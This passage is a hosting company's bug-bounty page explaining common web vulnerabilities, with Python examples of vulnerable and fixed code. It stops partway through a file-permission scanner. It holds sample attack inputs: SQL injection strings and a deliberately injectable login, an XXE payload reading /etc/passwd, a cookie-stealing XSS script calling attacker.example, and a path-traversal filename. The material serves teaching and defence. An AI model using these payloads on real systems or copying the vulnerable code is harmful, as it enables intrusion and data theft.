Earn Recognition & Free Hosting
Passionate about security? Join our open bounty program & report vulnerabilities (CSRF, XSS, SQLi)! We value your contribution & offer public recognition, free hosting, & a chance to make a real impact. Ethical hackers & security researchers welcome!

Overview of Vulnerabilities Open Bounty

At WebHostingM, we take security seriously and rely on the expertise of security researchers like you to help us identify and address vulnerabilities. This page outlines the key types of vulnerabilities we actively encourage you to report through our bounty program.


TLDR

Protecting Your Identity and Access:

  • Authentication Vulnerabilities: Weak login systems can give attackers access to user accounts, potentially compromising sensitive data. Report any issues with login processes, password resets, or two-factor authentication.
  • Cross-Site Scripting (XSS): Malicious code injected into websites can steal user information or perform unauthorized actions. Report any suspicious behavior or unexpected scripts on our platform.
  • Cross-Site Request Forgery (CSRF): Attackers can exploit website mechanics to trick users into performing harmful actions. Report any forms or functionalities that seem vulnerable to unauthorized requests.

Securing Your Information:

  • Sensitive Data Exposure: Unprotected personal information like passwords or credit card details attracts attackers. Report any instances where sensitive data might be stored or transmitted unencrypted or without proper access controls.
  • File Upload Vulnerabilities: Malicious files uploaded to our platform can harm users or the system. Report any issues with file types allowed, upload processes, or potential for data exfiltration through uploaded files.
  • Insecure Direct Object References (IDOR): Improper access controls can allow attackers to access resources they shouldn't, like other users' data. Report any vulnerabilities where manipulating URLs or identifiers grants unauthorized access.

Maintaining System Integrity:

  • Access Control Vulnerabilities: Users should only have access to features and data they're authorized for. Report any instances where users can bypass access controls or perform actions outside their intended permissions.
  • Security Misconfigurations: Incorrectly configured software or systems can create security gaps. Report any misconfigurations in server settings, applications, or other components that could be exploited.
  • Server-Side Request Forgery (SSRF): Attackers can manipulate internal requests to access sensitive data or launch internal attacks. Report any vulnerabilities that allow unauthorized manipulation of server-side requests.

Beyond the List:

Remember, this list is not exhaustive. We encourage you to think creatively and report any vulnerabilities that could impact the security of our platform and user data. We appreciate your contribution to building a safer online environment for everyone!



1. Injection

Imagine your website has a door with a "welcome" mat. Anyone can walk through the door and step on the mat, right?


Now imagine that mat can run instructions! If someone wrote malicious instructions on the mat instead of "Welcome," and the door didn't check what was written, those instructions could be activated when someone steps on it. This is what happens in an "injection attack."


Attackers try to sneak harmful code into our website through forms, comments, or other areas where users input information. If we don't check this code carefully, it can trick our website into doing bad things, like stealing data or messing things up.


That's why we have a bounty program! We reward people who help us find these "mat instructions" before they cause trouble. By working together, we can keep our website safe for everyone.


Here are some simple examples of "mat instructions":


  • Typing ' OR '1'='1 into a login form can sign an attacker in without a password, and '; DROP TABLE users;-- can delete every account, if the site glues the typed text straight into its SQL query (SQL injection).
  • A comment containing script tags that the site displays without escaping runs in every other visitor's browser (cross-site scripting, covered in section 7).
  • Harmful instructions hidden in any form field that the server passes on to a shell command, a template engine or a directory lookup can make the server run them or hand over data.
Remember, even if you don't understand code, you can still help! If you see anything suspicious on our website, please report it. Together, we can keep the bad guys out!
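The first "mat instruction" above, as working code. This is an added example and not code from WebHostingM's platform; the in-memory table and the two accounts are constructed for the demonstration, and passwords are kept in clear only to keep the example short (a real system stores a salted hash). The vulnerable function builds its query by string formatting, the fixed one hands the input to the driver as a parameter:

```python
import sqlite3
from typing import Optional, Tuple

# Constructed demo table: two users, clear-text passwords for brevity only.
def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Builds SQL by string formatting: whatever the user typed becomes part of the query.
    With password = ' OR '1'='1 the WHERE clause reads
        username = 'alice' AND password = '' OR '1'='1'
    which is true for every row, so the first user is 'logged in'."""
    query = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()  # a row means the login succeeded


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Parameterised query: the driver sends the values as data, never as SQL text,
    so quotes and keywords in the input have no special meaning."""
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_demo_db()
    payload = "' OR '1'='1"  # classic tautology: makes the WHERE clause always true
    print("vulnerable:", vulnerable_login(db, "alice", payload))  # a row, without the password
    print("safe:      ", safe_login(db, "alice", payload))        # None: no such password
```

The same rule applies to every query in the application, not only the login: any place that formats user input into SQL is a reportable injection, even when the result is not as dramatic as a dropped table.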

2. Authentication Vulnerabilities

Imagine your front door has a simple lock. Anyone could try common keys or guess the combination to get in, right? That's similar to a website with weak authentication. Hackers can use stolen passwords or automated tools to try millions of combinations until they find one that works.


Now imagine your door has a deadbolt, a security camera, and even an alarm! That's like our website with strong authentication. We use multiple layers of protection, like two-factor authentication (like a second lock) and session limits (like a timer on the security alarm).


Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in logout, password management, timeouts, remember me, secret questions, account updates, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.


This weak authentication can lead to big problems:


  • Hackers stealing your account: They can access your information, change your settings, or even impersonate you.
  • Hackers taking over the whole system: They might gain admin access and cause major damage.

We take authentication seriously and try to mitigate this vulnerability with:


  • Multiple authentication methods: Not just passwords, but also tokens and second-factor options.
  • Regular security checks: We constantly look for and fix weak spots.
  • Limited sessions: Even if someone gets in, their access doesn't last forever.
  • Advanced protection: We use special tools to block suspicious activity.

But we are more than aware that security is a team effort!


To our customers, partners, and visitors:


  • Use strong passwords and different ones for each website.
  • Enable two-factor authentication whenever possible.
  • Report any suspicious activity you see.

By working together, we can keep our online world safe and secure!
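The two mitigations named above that are easiest to get wrong in a custom scheme are brute-force throttling and session lifetime. Here they are in one small guard, as an added example that is not WebHostingM's code; the timeout and lockout values are assumed policy numbers, and `password_ok` stands in for the real credential check. The clock is injectable so the expiry rules can be exercised without waiting hours:

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Assumed policy values for this example; tune them to your own risk appetite.
IDLE_TIMEOUT = 15 * 60          # seconds without a request before a session expires
ABSOLUTE_LIFETIME = 8 * 3600    # hard cap, however active the session is
MAX_FAILURES = 5                # wrong passwords before an account locks
LOCKOUT_SECONDS = 15 * 60       # how long the lock lasts


class ManualClock:
    """Injectable clock so the policy can be exercised without real waiting."""

    def __init__(self, start: float = 1_700_000_000.0) -> None:
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


@dataclass
class Session:
    user: str
    created: float
    last_seen: float


class AuthGuard:
    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self.clock = clock
        self.failures: Dict[str, List[float]] = {}   # user -> recent failure timestamps
        self.sessions: Dict[str, Session] = {}       # token -> session (server-side state)

    def is_locked(self, user: str) -> bool:
        now = self.clock()
        recent = [t for t in self.failures.get(user, []) if now - t < LOCKOUT_SECONDS]
        self.failures[user] = recent
        return len(recent) >= MAX_FAILURES

    def login(self, user: str, password_ok: bool) -> Optional[str]:
        """`password_ok` stands in for the real credential check. A locked account gets
        the same None as a wrong password, so the lock itself is not an oracle."""
        if self.is_locked(user):
            return None
        if not password_ok:
            self.failures.setdefault(user, []).append(self.clock())
            return None
        self.failures.pop(user, None)
        token = secrets.token_urlsafe(32)            # 256 random bits: not guessable
        now = self.clock()
        self.sessions[token] = Session(user, now, now)
        return token

    def user_for(self, token: str) -> Optional[str]:
        """Resolves a token to a user, enforcing both timeouts; expired sessions are dropped."""
        s = self.sessions.get(token)
        if s is None:
            return None
        now = self.clock()
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_LIFETIME:
            del self.sessions[token]
            return None
        s.last_seen = now
        return s.user

    def logout(self, token: str) -> None:
        """Invalidate on the server; deleting the cookie alone leaves the token usable."""
        self.sessions.pop(token, None)
```

Two details worth checking when you test a real login: whether the lock is keyed only on the username (an attacker can then lock anyone out, so production systems usually combine it with per-IP limits and a slow hash), and whether logout actually removes the server-side session rather than just clearing the browser cookie.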


More about authentication and session management vulnerabilities from OWASP's Top 10:


3. Sensitive Data Exposure

Think of sensitive data as precious jewels kept in a treasure chest. These vulnerabilities arise when information like passwords, credit card numbers, or session tokens isn't adequately protected: stored in clear text, sent over plain HTTP, written to logs or error pages, or left in a backup anyone can download. Hackers who get to "peek" at these jewels cause financial harm or identity theft. Your reports help us build stronger chests, encrypt data and partner with trusted guards (payment processors) to keep your information safe.


How do we keep customers' information safe?


  • High-tech lock: We encrypt all your sensitive data, both on the wire (HTTPS) and where it's stored, so anyone who intercepts or copies it sees only scrambled bytes. It's like adding a super-strong lock to your treasure chest!
  • No peeking allowed: We don't keep payment card details on our systems at all, and passwords are stored only as salted hashes that can't be turned back into the original. It's like leaving the chest empty, so even if someone breaks in, they find nothing valuable.
  • Third-party guards: For payments, we partner with secure payment processors, like having trusted guards protect your chest instead of keeping it at home.
  • No forgetting the key: One-time codes and reset tokens are discarded as soon as they're used or expire, like throwing away the key after opening the chest.

Remember, security is a team effort. Join our bounty program and help us identify these vulnerabilities before they cause trouble. Together, we can create a fortress for your data and online experiences.
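Two of the practices above in code, as an added example that is not WebHostingM's own: storing a password as a salted, slow hash that can be verified but not reversed, and scrubbing card numbers out of log lines before they are written. The round count and record format are assumptions for the example; the log line is constructed:

```python
import hashlib
import hmac
import re
import secrets

# Assumed parameters for this example. 600,000 rounds of PBKDF2-HMAC-SHA256 matches
# current OWASP guidance; the rounds are stored with the hash so they can be raised
# later without forcing every user to reset.
PBKDF2_ROUNDS = 600_000
SALT_BYTES = 16


def hash_password(password: str) -> str:
    """Salted, slow hash in a self-describing record: algo$rounds$salt$digest."""
    salt = secrets.token_bytes(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recomputes with the stored salt and rounds; compare_digest keeps the timing constant
    so an attacker cannot learn how many leading bytes matched."""
    try:
        algo, rounds, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(rounds))
    except ValueError:          # malformed record: wrong field count or bad hex
        return False
    return hmac.compare_digest(candidate, expected)


# Card numbers in logs are the other classic exposure. A Luhn check keeps the redactor
# from mangling order numbers and timestamps that merely look like card numbers.
CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_ok(digits: str) -> bool:
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def redact_cards(line: str) -> str:
    """Masks all but the last four digits of any Luhn-valid 13-19 digit run."""
    def mask(match: "re.Match[str]") -> str:
        digits = re.sub(r"[ -]", "", match.group(0))
        if not luhn_ok(digits):
            return match.group(0)
        return "*" * (len(digits) - 4) + digits[-4:]
    return CARD_RE.sub(mask, line)
```

When reviewing a login system, the record format is what gives the scheme away: a fixed-length hex string with no salt, or one that is identical for two users with the same password, is a finding in itself.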


More about sensitive data exposure vulnerabilities from OWASP's Top 10:


4. XML External Entity (XXE) Attacks

Ever heard of "looking the other way" while someone sneaks in? That's kind of what happens in an XXE attack on a website. An XML document can declare "entities" that point at outside resources such as local files or internal URLs. If the parser accepts an attacker-supplied document and resolves those entities, it reads the file or fetches the URL and leaks the result, or simply chews through memory expanding nested entities until the service falls over.


Picture this: You use a special lockbox to store important things. An XEE attack is like tricking the lockbox into opening and sending its contents to the wrong person!


How do we stop these sneaky attacks?


  • Upgrading our defenses: We constantly update our systems and tools to stay ahead of evolving threats. It's like patching up any cracks in the lockbox.
  • Double-checking entries: We have security systems in place to monitor and block suspicious activity, like watching out for anyone trying to unlock the box the wrong way.
  • Saying no to outdated tech: Just like older locks become easier to pick, we're moving away from using XML in parts of our systems where it's less secure.

Join our security squad!


By reporting potential XXE vulnerabilities, you help us build even stronger defenses. Remember, security is a team effort!


XML or Extensible Markup Language is a markup language intended to be both human-readable and machine-readable. JSON has replaced it in many newer web APIs, but XML is still everywhere in SOAP services, SAML single sign-on, RSS feeds, SVG images and office documents, so any endpoint that accepts one of those formats is worth checking.
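The standard defence is to refuse DTDs altogether rather than trust a parser's defaults. The check below is an added example, not WebHostingM's code; the order format and the payload are constructed for the demonstration. It takes decoded text, rejects anything declaring a DOCTYPE before the parser sees it, and only then hands the document to the standard library:

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Without a DTD a document cannot declare entities at all, so external-entity file
# reads, SSRF through SYSTEM URLs and "billion laughs" expansion are ruled out no
# matter how the underlying parser is configured. XML keywords are case-sensitive,
# so "<!DOCTYPE" is the only spelling a conforming parser accepts; the check is
# case-insensitive anyway to be conservative.
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised for documents that use features we never need from clients."""


def parse_xml_safely(document: str) -> ET.Element:
    """Rejects any DTD, then parses. `document` is already-decoded text, so the check
    runs after any UTF-16/BOM handling rather than being fooled by it."""
    if DOCTYPE_RE.search(document):
        raise UnsafeXML("DOCTYPE/DTD declarations are not accepted from clients")
    return ET.fromstring(document)


def accepts(document: str) -> bool:
    """True if the document is parsed, False if the DTD guard rejects it."""
    try:
        parse_xml_safely(document)
        return True
    except UnsafeXML:
        return False


def order_items(document: str) -> List[Tuple[str, int]]:
    """Business logic on top of the safe parser: (sku, qty) pairs from an order."""
    root = parse_xml_safely(document)
    return [(item.get("sku", ""), int(item.get("qty", "0"))) for item in root.iter("item")]


# Constructed sample inputs, not captured traffic. The first one asks the parser to
# paste /etc/passwd into the sku attribute, which the response would then echo back.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE order [<!ENTITY secret SYSTEM "file:///etc/passwd">]>\n'
    "<order><item sku='&secret;' qty='1'/></order>"
)
BENIGN_ORDER = "<order><item sku='A1' qty='2'/><item sku='B7' qty='1'/></order>"
```

If a service must accept documents that legitimately carry a DOCTYPE, the alternative is to configure the parser itself to ignore DTDs and never resolve external entities; the pre-check is simpler and works the same with every parser.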

5. Broken Access Control

Imagine a castle with different levels of access: guests in the courtyard, knights in the training yard, and the king in his chambers. Access control is like the guards at each gate, making sure only authorized people reach the right places.


Broken access control vulnerabilities are like sneaky intruders slipping past the guards. In a website, this could mean attackers gaining access to areas they shouldn't, like seeing other users' info or messing with settings.


How do we keep our "castle" secure?


  • Clear rules for everyone: We define strict limits on what each user can do, like assigning different permissions to different roles.
  • Double-checking identities: Every action requiring more access requires extra verification, like asking for a special token instead of just a password.
  • Guarding sensitive areas: We have extra security measures for critical information, like keeping the king's chambers heavily guarded.

Join our security team!


By reporting potential access control vulnerabilities, you help us strengthen our digital castle walls and keep everyone's information safe. Remember, security is a shared responsibility!
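The IDOR bullet from the summary and the castle above, side by side in code. This is an added example and not WebHostingM's code; the invoice records and roles are constructed. The vulnerable function trusts the ID in the URL because the caller is logged in; the fixed versions check ownership on every object and role on every privileged action:

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class User:
    id: int
    role: str           # "customer" or "admin"


@dataclass(frozen=True)
class Invoice:
    id: int
    owner_id: int
    total_cents: int


class Forbidden(Exception):
    pass


# Constructed sample data, not real customer records.
INVOICES: Dict[int, Invoice] = {
    1001: Invoice(1001, owner_id=7, total_cents=4999),
    1002: Invoice(1002, owner_id=8, total_cents=12000),
}


def get_invoice_idor(current: User, invoice_id: int) -> Optional[Invoice]:
    """Vulnerable: the caller is authenticated, so the code assumes the ID in the URL
    is theirs. Change /invoices/1001 to /invoices/1002 and you read someone else's bill."""
    return INVOICES.get(invoice_id)


def get_invoice(current: User, invoice_id: int) -> Optional[Invoice]:
    """Fixed: object-level authorization on every access. A missing invoice and another
    customer's invoice both come back as None (an HTTP 404), so the endpoint cannot be
    used to enumerate which IDs exist."""
    inv = INVOICES.get(invoice_id)
    if inv is None:
        return None
    if current.role != "admin" and inv.owner_id != current.id:
        return None
    return inv


def delete_invoice(current: User, invoice_id: int) -> None:
    """Function-level authorization: deleting is an admin action regardless of ownership,
    and the check lives in the handler, not only in whether the button is shown."""
    if current.role != "admin":
        raise Forbidden("admin role required")
    INVOICES.pop(invoice_id, None)


def can_delete(current: User, invoice_id: int) -> bool:
    """Convenience wrapper returning True if the deletion was allowed and performed."""
    try:
        delete_invoice(current, invoice_id)
        return True
    except Forbidden:
        return False
```

When testing, the quickest signal is a sequential or predictable identifier in a URL or form field: take two accounts, swap the IDs, and see whether the second account's data comes back.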


6. Security Misconfigurations

Imagine building a house out of LEGOs. If you miss a piece or put one in the wrong place, the whole structure gets shaky, right? The same goes for websites and apps. Security misconfigurations are like missing or misplaced LEGOs, leaving gaps that attackers can exploit.


What are security misconfigurations?


It's when settings on different parts of a website (like the server, database, or code) aren't set up securely. Think of it as forgetting to lock your doors or leaving windows open on your LEGO house. Hackers can then sneak in and cause trouble.


How do we build secure systems?


  • Pre-built security fortress: We use special "hardened" operating systems and tools that are already configured securely, like having a pre-built LEGO house with strong walls and locks.
  • Automation magic: We use special tools to automatically check for any security gaps, like having a robot housekeeper looking for unlocked doors and windows.
  • Consistent building blocks: All our environments, from testing to production, are built the same way with different credentials, so there are no weak spots.

By reporting potential misconfigurations, you help us make our digital house even stronger. Remember, even small things can make a big difference!
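Many misconfigurations are visible from a single HTTP response: missing hardening headers, version numbers in `Server` and `X-Powered-By`, and session cookies set without their protective flags. The auditor below is an added example, not WebHostingM's tooling; the two responses it checks are constructed, not captured from any real host:

```python
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]   # (name, value) pairs, because Set-Cookie may repeat


def audit_response(headers: Headers) -> List[str]:
    """Flags common misconfigurations visible in one HTTPS response."""
    lower = [(name.lower(), value) for name, value in headers]
    first: Dict[str, str] = {}
    for name, value in lower:
        first.setdefault(name, value)
    findings: List[str] = []

    if "strict-transport-security" not in first:
        findings.append("missing Strict-Transport-Security: downgrade to HTTP possible")
    csp = first.get("content-security-policy", "")
    if not csp:
        findings.append("missing Content-Security-Policy")
    if first.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    if "x-frame-options" not in first and "frame-ancestors" not in csp:
        findings.append("no clickjacking protection (X-Frame-Options or CSP frame-ancestors)")
    server = first.get("server", "")
    if any(ch.isdigit() for ch in server):      # a product name alone is fine; a version is not
        findings.append(f"Server header leaks a version: {server}")
    if "x-powered-by" in first:
        findings.append("X-Powered-By leaks the application stack")

    for name, value in lower:                   # every cookie, not just the first
        if name != "set-cookie":
            continue
        cookie = value.split("=", 1)[0].strip()
        attrs = {part.strip().split("=", 1)[0].lower() for part in value.split(";")[1:]}
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append(f"cookie {cookie} lacks {flag}")
    return findings


# Constructed responses for the demonstration.
WEAK: Headers = [
    ("Server", "Apache/2.4.41 (Ubuntu)"),
    ("X-Powered-By", "PHP/7.4.3"),
    ("Content-Type", "text/html"),
    ("Set-Cookie", "PHPSESSID=abc123; path=/"),
]
HARDENED: Headers = [
    ("Server", "nginx"),
    ("Strict-Transport-Security", "max-age=63072000; includeSubDomains"),
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ("X-Content-Type-Options", "nosniff"),
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]
```

A version string in a header is not a vulnerability on its own, but it tells an attacker exactly which advisories to look up, which is why the audit treats it as a finding.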


More about security misconfigurations vulnerabilities from OWASP's Top 10


7. Cross-Site Scripting (XSS)

Imagine someone sneaking hidden instructions into a recipe you share online. That's what happens in an XSS attack! Attackers trick websites into accepting malicious code disguised as normal content, potentially harming website visitors.


What is XSS?


It's a sneaky way attackers inject harmful code into websites, like hiding instructions in a shared recipe. When someone visits the site, the code runs in their browser, potentially stealing information or causing damage.


How do we keep your recipes safe?


  • Security guards: We use a Content-Security-Policy header to tell browsers which sources of scripts, styles and other resources are approved, like a guard who only lets listed ingredients into the kitchen. A script injected from anywhere else is refused even if it makes it into the page.
  • Escaping every ingredient: The real fix for XSS is to encode user-supplied text for the place it lands (HTML body, attribute, URL or JavaScript) so the browser treats it as data, not code. The old X-XSS-Protection header is only a legacy hint: modern browsers have removed the filter it controlled, so it is no substitute for escaping and CSP.
  • Protecting your cookies: We treat session cookies (secret recipe notes) extra carefully: the HttpOnly flag keeps page scripts from reading them and the Secure flag keeps them off plain HTTP, so they are harder to steal even if a script does slip through.

Join our security kitchen!


By reporting potential XSS vulnerabilities, you help us keep everyone's online recipes safe. Remember, even small details can make a big difference!
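The three kitchen rules above as code: an unescaped template beside the escaped one, a nonce-based Content-Security-Policy, and a session cookie with its flags. This is an added example and not WebHostingM's code; the comment markup, the cookie name and the payload are constructed for the demonstration:

```python
import html
import secrets
from typing import Dict, Tuple


def render_comment_vulnerable(author: str, body: str) -> str:
    """What stored XSS looks like in code: user text pasted straight into HTML."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment(author: str, body: str) -> str:
    """Fixed: escape for the HTML text context. html.escape also escapes quotes by
    default, which matters if the same value ever lands inside an attribute."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def csp_header(nonce: str) -> str:
    """Only scripts we ship ('self') or tag with this response's nonce may run; an
    injected <script> tag or inline handler fails both tests."""
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; base-uri 'none'; frame-ancestors 'none'"
    )


def session_cookie(value: str) -> str:
    """Set-Cookie value: HttpOnly hides it from document.cookie, Secure keeps it off HTTP,
    SameSite=Lax keeps it off most cross-site requests."""
    return f"session={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


def build_page(author: str, body: str) -> Tuple[Dict[str, str], str]:
    """One response: a fresh nonce per page, the CSP that names it, escaped content,
    and our own script carrying the nonce so it still runs."""
    nonce = secrets.token_urlsafe(16)
    headers = {
        "Content-Security-Policy": csp_header(nonce),
        "Content-Type": "text/html; charset=utf-8",
    }
    page = (
        "<!doctype html><html><body>"
        + render_comment(author, body)
        + f'<script nonce="{nonce}">console.log("own script still runs")</script>'
        + "</body></html>"
    )
    return headers, page


# Constructed payload: the classic cookie-stealing comment.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
```

Escaping is context-specific: the `html.escape` call is right for text and attribute values but not for a value dropped into a `href`, a `<script>` block or a CSS rule, each of which needs its own encoder; a report that shows input reaching one of those contexts unencoded is just as valid as a plain `<script>` in a comment.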


8. Cross-Site Request Forgery (CSRF)

Imagine someone tricking you into clicking a hidden button on your phone that sends unauthorized texts from your number. That's kind of what happens in a CSRF attack! Attackers exploit how websites handle your logged-in state to make you unknowingly perform actions you didn't intend.


What is CSRF?


It's like someone hiding a sneaky button on your phone. When you visit a malicious website, it triggers that button without your knowledge, using your logged-in state to do things like changing your password or buying something in your name.


How do we keep your clicks safe?


  • Unique security code: Every form or request that changes something carries a secret anti-CSRF token tied to your session, like a password for your phone's buttons. A malicious site can't read or guess it, so it can't hijack your clicks. Browsers add a second layer when session cookies are marked SameSite, which keeps them off requests that other sites trigger.
  • Be vigilant! If you find a form or endpoint on our website that changes something (settings, password, purchases, contact details) and accepts the request without such a token, or a plain GET request that changes state, please report it!

By reporting potential CSRF vulnerabilities, you help us make your online experience safer and more secure. Remember, even small details can make a big difference!
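The "unique security code" above as an added example (not WebHostingM's implementation): a stateless token bound to the session with an HMAC, checked on a change-email endpoint together with the request method and the `Origin` header. The site origin, the request dictionary and the session IDs are constructed for the demonstration; in a real deployment the secret comes from configuration:

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

SERVER_SECRET = secrets.token_bytes(32)     # assumed: loaded from config in a real deployment
SITE_ORIGIN = "https://www.example.com"     # assumed origin of the site being protected


def make_csrf_token(session_id: str) -> str:
    """token = nonce.HMAC(secret, session_id:nonce). Binding it to the session means a
    token the attacker harvests from their own account is worthless against yours,
    and nothing needs to be stored server-side."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def check_csrf_token(session_id: str, token: Optional[str]) -> bool:
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)       # constant-time comparison


def handle_change_email(request: Dict, session_id: str) -> int:
    """Returns the HTTP status a change-email handler should send. `request` is a
    constructed dict with 'method', 'form' and 'headers' keys."""
    if request["method"] != "POST":
        return 405                                  # never change state on GET
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403                                  # browser says the request is cross-site
    if not check_csrf_token(session_id, request["form"].get("csrf_token")):
        return 403                                  # missing, malformed or foreign token
    return 200


def post(form: Dict[str, str], origin: Optional[str] = SITE_ORIGIN, method: str = "POST") -> Dict:
    """Builds a constructed request the way a browser would send it."""
    headers = {"Origin": origin} if origin else {}
    return {"method": method, "form": form, "headers": headers}
```

The `Origin` check is a cheap first line, not a replacement for the token: some requests arrive without the header, which is why the code only rejects when it is present and wrong.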


9. File Upload

Imagine someone sending you a delicious-looking cake, but you're not sure what's inside. That's kind of how file uploads can work on websites. We want to make sure only safe treats get through!


What are file upload vulnerabilities?


It's when attackers can upload malicious files disguised as harmless ones, potentially harming the website and its users. Think of someone putting a hidden "explosive filling" in the cake!


How do we keep everyone safe?


  • Security checkups: We have a list of approved file types, like checking ingredients before baking. Only safe ones make it through!
  • X-ray vision: We use special tools to scan uploaded files for hidden surprises, like checking for explosives in the cake.
  • Limited portions: We prevent attackers from sending giant files that could overwhelm our servers, like stopping someone from sending a cake the size of a house!
  • No secret messages: We make sure uploaded files can't be executed by the server or rendered as active content (such as HTML or SVG) in other users' browsers, like ensuring the cake doesn't contain hidden messages.

By reporting potential file upload vulnerabilities, you help us keep the digital cake fresh and safe for everyone. Remember, even small details can make a big difference!
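The checkups above as one validation routine, added here as an example and not taken from WebHostingM's platform. The allowlist, size limit and sample files are constructed; the routine caps the size, allows only the last extension, requires the bytes to carry that type's signature, and never uses the client's filename on disk:

```python
import os
import secrets
from typing import Dict, Tuple

MAX_BYTES = 5 * 1024 * 1024          # assumed limit for this example
# extension -> (signature the file must start with, MIME type it will be served as)
ALLOWED: Dict[str, Tuple[bytes, str]] = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "pdf": (b"%PDF-", "application/pdf"),
}


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename: str, data: bytes) -> Tuple[str, str]:
    """Returns (storage_name, content_type) or raises UploadRejected.

    - the size cap is applied before anything else is looked at
    - only the last extension counts (shell.php.png is judged as png), and it must be allowed
    - the bytes must carry the signature of the type the extension claims
    - the client's name never reaches the disk: a random name replaces it, which also
      disposes of any directory traversal such as ../../etc/cron.d/x.png
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    magic, content_type = ALLOWED[ext]
    if not data.startswith(magic):
        raise UploadRejected("content does not match the claimed type")
    return f"{secrets.token_hex(16)}.{ext}", content_type


def try_upload(client_filename: str, data: bytes) -> str:
    """Convenience wrapper: 'accepted:<ext>' or 'rejected:<reason>'."""
    try:
        name, _ = validate_upload(client_filename, data)
        return "accepted:" + name.rsplit(".", 1)[1]
    except UploadRejected as exc:
        return "rejected:" + str(exc)


# Constructed sample: the PNG signature followed by padding, enough for the check.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
```

Serving the stored file with the content type from the allowlist, from a path the web server will not execute, is the other half of the control; a signature check alone does not stop a valid image that also happens to be a valid PHP file if the server is willing to run it.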


10. Insecure File Permissions

Imagine leaving your house keys accessible to anyone on the street. That's what happens with insecure file permissions! Attackers can exploit misconfigured access controls to access sensitive files, potentially stealing customer data, messing with system settings, or launching further attacks.


How do we keep your files safe?


  • Locked doors: We assign proper access rights to files, like giving keys only to authorized personnel.
  • Regular security checks: We constantly scan and review file permissions to ensure they're locked tight.
  • Limited access: We restrict access to critical files further, adding extra security measures like requiring special codes.

By reporting potential insecure file permissions vulnerabilities, you help us build even stronger digital vaults for your data. Remember, security is a team effort!
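The "regular security checks" above, as an added example of a permission scan on a hosting account (not WebHostingM's own scanner). It walks a directory tree and reports world-writable entries, secret files readable by group or others, and setuid binaries, using POSIX permission bits; the demo tree it builds in a temporary directory is constructed, and the list of secret filenames is an assumption:

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Assumed list of files that should never be readable by anyone but their owner.
SECRET_NAMES = {".env", "wp-config.php", "config.php", "id_rsa"}


def find_insecure_permissions(root: str) -> List[Tuple[str, str]]:
    """Returns (relative path, finding) pairs, sorted, for everything under root."""
    findings: List[Tuple[str, str]] = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)         # lstat: judge the link, not its target
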